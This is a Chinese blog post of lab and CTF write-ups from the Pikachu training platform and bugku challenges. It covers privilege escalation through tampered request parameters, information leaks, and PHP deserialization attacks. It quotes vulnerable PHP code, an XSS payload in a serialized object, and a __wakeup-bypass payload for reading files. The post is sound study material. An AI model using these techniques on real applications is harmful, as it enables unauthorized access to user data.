<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="web安全,">










<meta name="description" content="越权 概述 如果使用A用户的权限去操作B用户的数据，A的权限小于B的权限，如果能够成功操作，则称之为越权操作。 越权漏洞形成的原因是后台使用了 不合理的权限校验规则导致的。   ​ 一般越权漏洞容易出现在权限页面（需要登录的页面）增、删、改、查的的地方，当用户对权限页面内的信息进行这些操作时，后台需要对 对当前用户的权限进行校验，看其是否具备操作的权限，从而给出响应，而如果校验的规则过于简单则容易">
<meta name="keywords" content="web安全">
<meta property="og:type" content="article">
<meta property="og:title" content="pikachu漏洞平台学习（7）">
<meta property="og:url" content="https://srat1999.top/2019/07/27/pikachu漏洞平台学习（7）/index.html">
<meta property="og:site_name" content="Stay hungry stay foolish">
<meta property="og:description" content="越权 概述 如果使用A用户的权限去操作B用户的数据，A的权限小于B的权限，如果能够成功操作，则称之为越权操作。 越权漏洞形成的原因是后台使用了 不合理的权限校验规则导致的。   ​ 一般越权漏洞容易出现在权限页面（需要登录的页面）增、删、改、查的的地方，当用户对权限页面内的信息进行这些操作时，后台需要对 对当前用户的权限进行校验，看其是否具备操作的权限，从而给出响应，而如果校验的规则过于简单则容易">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-27_13-59-19.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-27_14-07-20.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-27_14-08-43.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-27_14-16-19.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-27_14-23-39.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-09-12_18-49-39.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-09-12_18-51-14.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-09-12_19-20-41.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-09-12_19-35-16.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-09-12_19-40-51.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-09-12_19-45-46.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-09-12_19-46-25.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-10-26_17-09-00.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-10-26_17-09-54.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-27_20-12-23.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-27_21-00-10.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-27_21-01-40.png">
<meta property="og:updated_time" content="2019-11-30T04:25:54.501Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="pikachu漏洞平台学习（7）">
<meta name="twitter:description" content="越权 概述 如果使用A用户的权限去操作B用户的数据，A的权限小于B的权限，如果能够成功操作，则称之为越权操作。 越权漏洞形成的原因是后台使用了 不合理的权限校验规则导致的。   ​ 一般越权漏洞容易出现在权限页面（需要登录的页面）增、删、改、查的的地方，当用户对权限页面内的信息进行这些操作时，后台需要对 对当前用户的权限进行校验，看其是否具备操作的权限，从而给出响应，而如果校验的规则过于简单则容易">
<meta name="twitter:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-27_13-59-19.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://srat1999.top/2019/07/27/pikachu漏洞平台学习（7）/">





  <title>pikachu漏洞平台学习（7） | Stay hungry stay foolish</title>
  








<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Stay hungry stay foolish</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">srat1999's blog</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://srat1999.top/2019/07/27/pikachu漏洞平台学习（7）/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="srat1999">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/uploads/pikachu.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Stay hungry stay foolish">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">pikachu漏洞平台学习（7）</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-07-27T09:12:30+08:00">
                2019-07-27
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/靶场/" itemprop="url" rel="index">
                    <span itemprop="name">靶场</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  3.7k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  15
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="越权"><a href="#越权" class="headerlink" title="越权"></a>越权</h1><h3 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h3><blockquote>
<p>如果使用A用户的权限去操作B用户的数据，A的权限小于B的权限，如果能够成功操作，则称之为越权操作。                     越权漏洞形成的原因是后台使用了 不合理的权限校验规则导致的。                 </p>
<p>​                     一般越权漏洞容易出现在权限页面（需要登录的页面）增、删、改、查的的地方，当用户对权限页面内的信息进行这些操作时，后台需要对                     对当前用户的权限进行校验，看其是否具备操作的权限，从而给出响应，而如果校验的规则过于简单则容易出现越权漏洞。                 </p>
<p>​                     因此，在在权限管理中应该遵守：<br>​                     1.使用最小权限原则对用户进行赋权;<br>​                     2.使用合理（严格）的权限校验规则;<br>​                     3.使用后台登录态作为条件进行权限判断,别动不动就瞎用前端传进来的条件;<br>​                  </p>
<p>​                     你可以通过“Over permission”对应的测试栏目，来进一步的了解该漏洞。</p>
</blockquote>
<h3 id="0x01-水平越权"><a href="#0x01-水平越权" class="headerlink" title="0x01 水平越权"></a>0x01 水平越权</h3><p>用lucy登陆，点击查看个人信息。</p>
<p>url如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/vul/overpermission/op1/op1_mem.php?username=lucy&amp;submit=%E7%82%B9%E5%87%BB%E6%9F%A5%E7%9C%8B%E4%B8%AA%E4%BA%BA%E4%BF%A1%E6%81%AF</span><br></pre></td></tr></table></figure>
<p>尝试更改usernme为lili</p>
<p>发现可以查看lili的信息，产生水平越权。</p>
<p>后台代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">$html=<span class="string">''</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'submit'</span>]) &amp;&amp; $_GET[<span class="string">'username'</span>]!=<span class="keyword">null</span>)&#123;</span><br><span class="line">    <span class="comment">//没有使用session来校验,而是使用的传进来的值，权限校验出现问题,这里应该跟登录态关系进行绑定</span></span><br><span class="line">    $username=escape($link, $_GET[<span class="string">'username'</span>]);</span><br><span class="line">    $query=<span class="string">"select * from member where username='$username'"</span>;</span><br><span class="line">    $result=execute($link, $query);</span><br><span class="line">    <span class="keyword">if</span>(mysqli_num_rows($result)==<span class="number">1</span>)&#123;</span><br><span class="line">        $data=mysqli_fetch_assoc($result);</span><br><span class="line">        $uname=$data[<span class="string">'username'</span>];</span><br><span class="line">        $sex=$data[<span class="string">'sex'</span>];</span><br><span class="line">        $phonenum=$data[<span class="string">'phonenum'</span>];</span><br><span class="line">        $add=$data[<span class="string">'address'</span>];</span><br><span class="line">        $email=$data[<span class="string">'email'</span>];</span><br></pre></td></tr></table></figure>
<p>没有使用session来校验,而是使用的传进来的值，权限校验出现问题,这里应该跟登录态关系进行绑定.</p>
<h3 id="0x02-垂直越权"><a href="#0x02-垂直越权" class="headerlink" title="0x02 垂直越权"></a>0x02 垂直越权</h3><p>用普通用户登陆，只有查看权限。而管理员有曾删查权限。</p>
<p>而且网站有目录遍历</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-27_13-59-19.png" alt></p>
<p>发现有编辑页面。有添加用户功能。出现垂直越权。</p>
<p>后台代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">$link=connect();</span><br><span class="line"><span class="comment">// 判断是否登录，没有登录不能访问</span></span><br><span class="line"><span class="comment">//这里只是验证了登录状态，并没有验证级别，所以存在越权问题。</span></span><br><span class="line"><span class="keyword">if</span>(!check_op2_login($link))&#123;</span><br><span class="line">    header(<span class="string">"location:op2_login.php"</span>);</span><br><span class="line">    <span class="keyword">exit</span>();</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>]))&#123;</span><br><span class="line">    <span class="keyword">if</span>($_POST[<span class="string">'username'</span>]!=<span class="keyword">null</span> &amp;&amp; $_POST[<span class="string">'password'</span>]!=<span class="keyword">null</span>)&#123;<span class="comment">//用户名密码必填</span></span><br><span class="line">        $getdata=escape($link, $_POST);<span class="comment">//转义</span></span><br><span class="line">        $query=<span class="string">"insert into member(username,pw,sex,phonenum,email,address) values('&#123;$getdata['username']&#125;',md5('&#123;$getdata['password']&#125;'),'&#123;$getdata['sex']&#125;','&#123;$getdata['phonenum']&#125;','&#123;$getdata['email']&#125;','&#123;$getdata['address']&#125;')"</span>;</span><br><span class="line">        $result=execute($link, $query);</span><br></pre></td></tr></table></figure>
<h1 id="敏感信息泄露"><a href="#敏感信息泄露" class="headerlink" title="敏感信息泄露"></a>敏感信息泄露</h1><h3 id="概述-1"><a href="#概述-1" class="headerlink" title="概述"></a>概述</h3><blockquote>
<p>由于后台人员的疏忽或者不当的设计，导致不应该被前端用户看到的数据被轻易的访问到。                         比如：<br>                         —通过访问url下的目录，可以直接列出目录下的文件列表;<br>                         —输入错误的url参数后报错信息里面包含操作系统、中间件、开发语言的版本或其他信息;<br>                         —前端的源码（html,css,js）里面包含了敏感信息，比如后台登录地址、内网接口信息、甚至账号密码等;</p>
<p>​                         类似以上这些情况，我们成为敏感信息泄露。敏感信息泄露虽然一直被评为危害比较低的漏洞，但这些敏感信息往往给攻击着实施进一步的攻击提供很大的帮助,甚至“离谱”的敏感信息泄露也会直接造成严重的损失。                         因此,在web应用的开发上，除了要进行安全的代码编写，也需要注意对敏感信息的合理处理。                      </p>
<p>​                         你可以通过“i can see your abc”对应的测试栏目，来进一步的了解该漏洞。                     </p>
</blockquote>
<h3 id="0x01举例"><a href="#0x01举例" class="headerlink" title="0x01举例"></a>0x01举例</h3><p>一个登陆界面，查看网页源代码：</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-27_14-07-20.png" alt></p>
<p>也存在目录泄露：</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-27_14-08-43.png" alt></p>
<p>直接访问abc.php</p>
<h1 id="php反序列化"><a href="#php反序列化" class="headerlink" title="php反序列化"></a>php反序列化</h1><h3 id="概述-2"><a href="#概述-2" class="headerlink" title="概述"></a>概述</h3><blockquote>
<p>序列化serialize()</p>
<p>​             序列化说通俗点就是把一个对象变成可以传输的字符串,比如下面是一个对象:             </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">&gt;     <span class="class"><span class="keyword">class</span> <span class="title">S</span></span>&#123;</span><br><span class="line">&gt;         <span class="keyword">public</span> $test=<span class="string">"pikachu"</span>;</span><br><span class="line">&gt;     &#125;</span><br><span class="line">&gt;     $s=<span class="keyword">new</span> S(); <span class="comment">//创建一个对象</span></span><br><span class="line">&gt;     serialize($s); <span class="comment">//把这个对象进行序列化</span></span><br><span class="line">&gt;     序列化后得到的结果是这个样子的:O:<span class="number">1</span>:<span class="string">"S"</span>:<span class="number">1</span>:&#123;s:<span class="number">4</span>:<span class="string">"test"</span>;s:<span class="number">7</span>:<span class="string">"pikachu"</span>;&#125;</span><br><span class="line">&gt;         O:代表object</span><br><span class="line">&gt;         <span class="number">1</span>:代表对象名字长度为一个字符</span><br><span class="line">&gt;         S:对象的名称</span><br><span class="line">&gt;         <span class="number">1</span>:代表对象里面有一个变量</span><br><span class="line">&gt;         s:数据类型</span><br><span class="line">&gt;         <span class="number">4</span>:变量名称的长度</span><br><span class="line">&gt;         test:变量名称</span><br><span class="line">&gt;         s:数据类型</span><br><span class="line">&gt;         <span class="number">7</span>:变量值的长度</span><br><span class="line">&gt;         pikachu:变量值</span><br><span class="line">&gt;     </span><br><span class="line">&gt;</span><br></pre></td></tr></table></figure>
</blockquote>
<blockquote>
<p>反序列化unserialize()</p>
<p>就是把被序列化的字符串还原为对象,然后在接下来的代码中继续使用。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&gt;     $u=unserialize(<span class="string">"O:1:"</span>S<span class="string">":1:&#123;s:4:"</span>test<span class="string">";s:7:"</span>pikachu<span class="string">";&#125;"</span>);</span><br><span class="line">&gt;     <span class="keyword">echo</span> $u-&gt;test; <span class="comment">//得到的结果为pikachu</span></span><br><span class="line">&gt;     </span><br><span class="line">&gt;</span><br></pre></td></tr></table></figure>
</blockquote>
<blockquote>
<p>序列化和反序列化本身没有问题,但是如果反序列化的内容是用户可以控制的,且后台不正当的使用了PHP中的魔法函数,就会导致安全问题</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">&gt;         常见的几个魔法函数:</span><br><span class="line">&gt;         __construct()当一个对象创建时被调用</span><br><span class="line">&gt; </span><br><span class="line">&gt;         __destruct()当一个对象销毁时被调用</span><br><span class="line">&gt; </span><br><span class="line">&gt;         __toString()当一个对象被当作一个字符串使用</span><br><span class="line">&gt; </span><br><span class="line">&gt;         __sleep() 在对象在被序列化之前运行</span><br><span class="line">&gt; </span><br><span class="line">&gt;         __wakeup将在序列化之后立即被调用</span><br><span class="line">&gt; </span><br><span class="line">&gt;         漏洞举例:</span><br><span class="line">&gt; </span><br><span class="line">&gt;         <span class="class"><span class="keyword">class</span> <span class="title">S</span></span>&#123;</span><br><span class="line">&gt;             <span class="keyword">var</span> $test = <span class="string">"pikachu"</span>;</span><br><span class="line">&gt;             <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span><span class="params">()</span></span>&#123;</span><br><span class="line">&gt;                 <span class="keyword">echo</span> <span class="keyword">$this</span>-&gt;test;</span><br><span class="line">&gt;             &#125;</span><br><span class="line">&gt;         &#125;</span><br><span class="line">&gt;         $s = $_GET[<span class="string">'test'</span>];</span><br><span class="line">&gt;         @$unser = unserialize($a);</span><br><span class="line">&gt; </span><br><span class="line">&gt;         payload:O:<span class="number">1</span>:<span class="string">"S"</span>:<span class="number">1</span>:&#123;s:<span class="number">4</span>:<span class="string">"test"</span>;s:<span class="number">29</span>:<span class="string">"&lt;script&gt;alert('xss')&lt;/script&gt;"</span>;&#125;</span><br><span class="line">&gt; </span><br><span class="line">&gt;     </span><br><span class="line">&gt;</span><br></pre></td></tr></table></figure>
</blockquote>
<p><a href="https://www.freebuf.com/articles/web/167721.html" target="_blank" rel="noopener">php反序列化入门</a></p>
<h3 id="0x01-php反序列化漏洞"><a href="#0x01-php反序列化漏洞" class="headerlink" title="0x01 php反序列化漏洞"></a>0x01 php反序列化漏洞</h3><p>通过文件下载漏洞下载反序列化源码：</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-27_14-16-19.png" alt></p>
<p>得到后台源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">S</span></span>&#123;</span><br><span class="line">    <span class="keyword">var</span> $test = <span class="string">"pikachu"</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span></span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="keyword">$this</span>-&gt;test;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">//O:1:"S":1:&#123;s:4:"test";s:29:"&lt;script&gt;alert('xss')&lt;/script&gt;";&#125;</span></span><br><span class="line">$html=<span class="string">''</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'o'</span>]))&#123;</span><br><span class="line">    $s = $_POST[<span class="string">'o'</span>];</span><br><span class="line">    <span class="keyword">if</span>(!@$unser = unserialize($s))&#123;</span><br><span class="line">        $html.=<span class="string">"&lt;p&gt;大兄弟,来点劲爆点儿的!&lt;/p&gt;"</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        $html.=<span class="string">"&lt;p&gt;&#123;$unser-&gt;test&#125;&lt;/p&gt;"</span>;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>注释已经给出payload，构造反射xss。</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-27_14-23-39.png" alt></p>
<hr>
<p>2019-8-27 反序列化更新</p>
<p><a href="http://123.206.31.85:10024/" target="_blank" rel="noopener">bugkuctf web24</a></p>
<p>打开页面是一个类似淘宝的页面，没什么可点的，查看源码，拉到最低能够看到注释说有/index/index.php.</p>
<p>打开之后是一段php：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>  </span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Small_white_rabbit</span></span>&#123;  </span><br><span class="line">    <span class="keyword">private</span> $file = <span class="string">'index.php'</span>;  </span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">($file)</span> </span>&#123;  </span><br><span class="line">        <span class="keyword">$this</span>-&gt;file = $file;  </span><br><span class="line">    &#125;  </span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span><span class="params">()</span> </span>&#123;  </span><br><span class="line">        <span class="keyword">echo</span> @highlight_file(<span class="keyword">$this</span>-&gt;file, <span class="keyword">true</span>);  </span><br><span class="line">    &#125;  </span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span><span class="params">()</span> </span>&#123;  </span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">$this</span>-&gt;file != <span class="string">'index.php'</span>) &#123;  </span><br><span class="line">            <span class="comment">//the secret is in the_f1ag.php  </span></span><br><span class="line">            <span class="keyword">$this</span>-&gt;file = <span class="string">'index.php'</span>;  </span><br><span class="line">        &#125;  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125;  </span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'var'</span>])) &#123;  </span><br><span class="line">    $var = base64_decode($_GET[<span class="string">'var'</span>]);  </span><br><span class="line">    @unserialize($var);  </span><br><span class="line">&#125; <span class="keyword">else</span> &#123;  </span><br><span class="line">    highlight_file(<span class="string">"index.php"</span>);  </span><br><span class="line">&#125;  </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>明显是反序列化，这题对于大佬来说可能非常简单，但对于我这个菜鸡，反序列化没做几题，实际实践也没碰到一次的菜鸡来说，还是比较难的了。</p>
<p>代码要求我们get方式发送var，base64解码，使得反序列化后得到flag。这里一个知识点就是_weakup()魔法函数绕过。因为在我们提交的序列化字符必定要指定<strong>$file</strong>为<strong>the_flag.php</strong>,而_weakup函数在反序列化后会被调用，检查到file不是index.php就强制修改为index.php。所以必须绕过_weakup()。</p>
<p>上网查资料了解可以利用php反序列化注入漏洞。简单来说，当序列化字符串中，表示对象属性个数的值大于实际属性个数时，那么就会跳过wakeup方法的执行<strong>。</strong></p>
<p>这里在构造payload是还要注意$file属性为private，所以在构造时左右两边要加上    <strong>.</strong></p>
<p>即：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:<span class="number">18</span>:<span class="string">"Small_white_rabbit"</span>:<span class="number">2</span>:&#123;s:<span class="number">24</span>:<span class="string">".Small_white_rabbit.file"</span>;s:<span class="number">12</span>:<span class="string">"the_f1ag.php"</span>;&#125;</span><br></pre></td></tr></table></figure>
<p>另外如果属性被protect修饰 则要加*，即：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:<span class="number">18</span>:<span class="string">"Small_white_rabbit"</span>:<span class="number">2</span>:&#123;s:<span class="number">7</span>:<span class="string">".*.file"</span>;s:<span class="number">12</span>:<span class="string">"the_flag.php"</span>;&#125;</span><br></pre></td></tr></table></figure>
<hr>
<p>2019.9.12更新</p>
<p><strong>php://input+php://filter+php反序列化</strong></p>
<p>new bugku web21</p>
<p>首先进入题目主页</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-09-12_18-49-39.png" alt></p>
<p>没有什么东西</p>
<p>右键查看源码</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-09-12_18-51-14.png" alt></p>
<p>看到提示，后台接收三个参数，并且要求user（文件）值为<strong>admin</strong>.这里用php://input来控制user的值，post数据为admin。用hackbar构造payload。</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-09-12_19-20-41.png" alt></p>
<p>绕过第一层判断。</p>
